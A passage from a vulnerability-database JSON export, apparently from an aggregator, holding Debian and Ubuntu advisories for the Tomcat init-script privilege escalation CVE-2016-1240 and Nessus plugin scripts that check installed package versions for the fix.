"[SECURITY] [DLA 622-1] tomcat6 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:18", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3670-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nSeptember 15, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : tomcat8\nCVE ID : CVE-2016-1240\n\nDawid Golunski of LegalHackers discovered that the Tomcat init script\nperformed unsafe file handling, which could result in local privilege\nescalation.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 8.0.14-1+deb8u3.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your tomcat8 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2016-09-15T17:28:15", "published": "2016-09-15T17:28:15", "id": "DEBIAN:DSA-3670-1:7364A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00249.html", "title": "[SECURITY] [DSA 3670-1] tomcat8 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-01T02:21:28", "bulletinFamily": "scanner", "description": "Dawid Golunski of LegalHackers discovered that the Tomcat init script\nperformed unsafe file handling, which could result in local privilege\nescalation.", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-3669.NASL", "href": "https://www.tenable.com/plugins/nessus/93548", "published": "2016-09-16T00:00:00", "title": "Debian DSA-3669-1 : tomcat7 - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3669. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93548);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2018/11/10 11:49:38\");\n\n script_cve_id(\"CVE-2016-1240\");\n script_xref(name:\"DSA\", value:\"3669\");\n\n script_name(english:\"Debian DSA-3669-1 : tomcat7 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dawid Golunski of LegalHackers discovered that the Tomcat init script\nperformed unsafe file handling, which could result in local privilege\nescalation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/tomcat7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3669\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the tomcat7 packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 7.0.56-3+deb8u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.0-java\", reference:\"7.0.56-3+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.0-java-doc\", reference:\"7.0.56-3+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libtomcat7-java\", reference:\"7.0.56-3+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7\", reference:\"7.0.56-3+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-admin\", reference:\"7.0.56-3+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-common\", reference:\"7.0.56-3+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-docs\", reference:\"7.0.56-3+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-examples\", reference:\"7.0.56-3+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-user\", reference:\"7.0.56-3+deb8u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:21:28", "bulletinFamily": "scanner", "description": "Dawid Golunski of LegalHackers discovered that the Tomcat init script\nperformed unsafe file handling, which could result in local privilege\nescalation.", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-3670.NASL", "href": "https://www.tenable.com/plugins/nessus/93549", "published": "2016-09-16T00:00:00", "title": "Debian DSA-3670-1 : tomcat8 - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3670. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93549);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2018/11/10 11:49:38\");\n\n script_cve_id(\"CVE-2016-1240\");\n script_xref(name:\"DSA\", value:\"3670\");\n\n script_name(english:\"Debian DSA-3670-1 : tomcat8 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dawid Golunski of LegalHackers discovered that the Tomcat init script\nperformed unsafe file handling, which could result in local privilege\nescalation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/tomcat8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3670\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the tomcat8 packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 8.0.14-1+deb8u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.1-java\", reference:\"8.0.14-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.1-java-doc\", reference:\"8.0.14-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libtomcat8-java\", reference:\"8.0.14-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8\", reference:\"8.0.14-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-admin\", reference:\"8.0.14-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-common\", reference:\"8.0.14-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-docs\", reference:\"8.0.14-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-examples\", reference:\"8.0.14-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-user\", reference:\"8.0.14-1+deb8u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:20:39", "bulletinFamily": "scanner", "description": "Dawid Golunski from legalhackers.com discovered that Debian", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DLA-622.NASL", "href": "https://www.tenable.com/plugins/nessus/93544", "published": "2016-09-16T00:00:00", "title": "Debian DLA-622-1 : tomcat6 security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-622-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93544);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2018/09/05 12:31:21\");\n\n script_cve_id(\"CVE-2016-1240\");\n\n script_name(english:\"Debian DLA-622-1 : tomcat6 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dawid Golunski from legalhackers.com discovered that Debian's version\nof Tomcat 6 was vulnerable to a local privilege escalation. Local\nattackers who have gained access to the server in the context of the\ntomcat6 user through a vulnerability in a web application were able to\nreplace the file with a symlink to an arbitrary file.\n\nThe full advisory can be found at\n\nhttp://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-\nEs calation-Exploit.txt\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n6.0.45+dfsg-1~deb7u2.\n\nWe recommend that you upgrade your tomcat6 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n # http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Es\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c0b304c1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/09/msg00015.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/tomcat6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet2.4-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet2.5-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet2.5-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtomcat6-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libservlet2.4-java\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libservlet2.5-java\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libservlet2.5-java-doc\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtomcat6-java\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat6\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat6-admin\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat6-common\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat6-docs\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat6-examples\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat6-extras\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat6-user\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:20:39", "bulletinFamily": "scanner", "description": "Dawid Golunski from legalhackers.com discovered that Debian", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DLA-623.NASL", "href": "https://www.tenable.com/plugins/nessus/93545", "published": "2016-09-16T00:00:00", "title": "Debian DLA-623-1 : tomcat7 security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-623-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93545);\n script_version(\"2.6\");\n script_cvs_date(\"Date: 2018/07/09 14:30:26\");\n\n script_cve_id(\"CVE-2016-1240\");\n\n script_name(english:\"Debian DLA-623-1 : tomcat7 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dawid Golunski from legalhackers.com discovered that Debian's version\nof Tomcat 7 was vulnerable to a local privilege escalation. Local\nattackers who have gained access to the server in the context of the\ntomcat7 user through a vulnerability in a web application were able to\nreplace the file with a symlink to an arbitrary file.\n\nThe full advisory can be found at\n\nhttp://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-\nEscalation-Exploit.txt\n\nIn addition this security update also fixes Debian bug #821391. File\nownership in /etc/tomcat7 will no longer be unconditionally overridden\non upgrade. As another precaution the file permissions of Debian\nspecific configuration files in /etc/tomcat7 were changed to 640 to\ndisallow world readable access.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n7.0.28-4+deb7u6.\n\nWe recommend that you upgrade your tomcat7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n # http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Escalation-Exploit.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f1cb3176\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/09/msg00016.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/tomcat7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.0-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.0-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtomcat7-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libservlet3.0-java\", reference:\"7.0.28-4+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libservlet3.0-java-doc\", reference:\"7.0.28-4+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtomcat7-java\", reference:\"7.0.28-4+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7\", reference:\"7.0.28-4+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7-admin\", reference:\"7.0.28-4+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7-common\", reference:\"7.0.28-4+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7-docs\", reference:\"7.0.28-4+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7-examples\", reference:\"7.0.28-4+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7-user\", reference:\"7.0.28-4+deb7u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:31:08", "bulletinFamily": "scanner", "description": "Dawid Golunski discovered that the Tomcat init script incorrectly\nhandled creating log files. A remote attacker could possibly use this\nissue to obtain root privileges. (CVE-2016-1240)\n\nThis update also reverts a change in behaviour introduced in\nUSN-3024-1 by setting mapperContextRootRedirectEnabled to True by\ndefault.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-3081-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93600", "published": "2016-09-20T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS : tomcat6, tomcat7, tomcat8 vulnerability (USN-3081-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3081-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93600);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-1240\");\n script_xref(name:\"USN\", value:\"3081-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS : tomcat6, tomcat7, tomcat8 vulnerability (USN-3081-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dawid Golunski discovered that the Tomcat init script incorrectly\nhandled creating log files. A remote attacker could possibly use this\nissue to obtain root privileges. (CVE-2016-1240)\n\nThis update also reverts a change in behaviour introduced in\nUSN-3024-1 by setting mapperContextRootRedirectEnabled to True by\ndefault.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3081-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtomcat6-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtomcat7-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtomcat8-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 